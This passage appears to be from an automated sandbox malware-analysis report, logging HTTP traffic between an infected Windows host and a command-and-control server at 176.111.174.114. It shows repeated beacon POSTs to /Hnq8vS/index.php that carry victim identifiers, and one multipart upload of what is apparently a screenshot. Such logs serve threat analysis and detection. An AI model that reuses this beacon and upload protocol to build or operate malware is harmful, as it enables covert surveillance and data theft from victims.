                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
361 | 176.111.174.114 | 80 | 192.168.2.4 | 49965 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.582061052 CEST | 10911 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:07 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
362 | 192.168.2.4 | 49966 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.805188894 CEST | 10911 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
363 | 176.111.174.114 | 80 | 192.168.2.4 | 49966 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.906785011 CEST | 10912 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:07 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
364 | 192.168.2.4 | 49968 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:08.115504980 CEST | 10912 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
365 | 176.111.174.114 | 80 | 192.168.2.4 | 49968 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:08.220160007 CEST | 10913 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:08 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          366 | 192.168.2.4 | 49969 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:08.434032917 CEST | 10914 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          367 | 176.111.174.114 | 80 | 192.168.2.4 | 49969 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:08.536611080 CEST | 10914 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:08 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          368 | 192.168.2.4 | 49970 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:08.735421896 CEST | 10914 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          369 | 176.111.174.114 | 80 | 192.168.2.4 | 49970 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:08.832598925 CEST | 10915 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:08 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          37 | 176.111.174.114 | 80 | 192.168.2.4 | 49766 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:16.448168039 CEST | 4539 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          370 | 192.168.2.4 | 49971 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:09.226793051 CEST | 10916 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          371 | 176.111.174.114 | 80 | 192.168.2.4 | 49971 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:09.324096918 CEST | 10916 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          372 | 192.168.2.4 | 49972 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:09.464628935 CEST | 10929 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Ascii: --152138533219.jpg
                                                                                                                                          Content-Disposition: form-data; name="data"; filename="152138533219.jpg"
                                                                                                                                          Content-Type: application/octet-stream


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          373 | 192.168.2.4 | 49973 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:09.552373886 CEST | 10930 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 374 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49973 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:09.665091038 CEST | kBytes transferred: 10989 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 375 | Source IP: 192.168.2.4 | Source Port: 49974 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:09.885467052 CEST | kBytes transferred: 11145 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 376 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49972 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:09.965620995 CEST | kBytes transferred: 11146 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID: 377 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49974 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:09.990391016 CEST | kBytes transferred: 11146 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:09 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 378 | Source IP: 192.168.2.4 | Source Port: 49976 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:10.585930109 CEST | kBytes transferred: 11147 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 379 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49976 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:10.689419031 CEST | kBytes transferred: 11148 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 22:59:16.671982050 CEST | kBytes transferred: 4540 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 380 | Source IP: 192.168.2.4 | Source Port: 49977 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:10.969852924 CEST | kBytes transferred: 11148 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 381 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49977 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:11.069154978 CEST | kBytes transferred: 11149 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 382 | Source IP: 192.168.2.4 | Source Port: 49979 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:12.207299948 CEST | kBytes transferred: 11149 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 383 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49979 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:12.306950092 CEST | kBytes transferred: 11150 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 384 | Source IP: 192.168.2.4 | Source Port: 49980 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:12.526020050 CEST | kBytes transferred: 11150 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 385 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49980 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:12.624404907 CEST | kBytes transferred: 11151 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 386 | Source IP: 192.168.2.4 | Source Port: 49981 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:12.836747885 CEST | kBytes transferred: 11151 | Direction: OUT | Data: POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 387 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49981 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:12.940705061 CEST | kBytes transferred: 11152 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
388 | 192.168.2.4 | 49982 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.146498919 CEST | 11152 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
389 | 176.111.174.114 | 80 | 192.168.2.4 | 49982 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.248759985 CEST | 11153 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 176.111.174.114 | 80 | 192.168.2.4 | 49767 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:16.775975943 CEST | 4540 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 20:59:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
390 | 192.168.2.4 | 49983 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.458813906 CEST | 11153 | OUT | POST /Hnq8vS/index.php HTTP/1.1
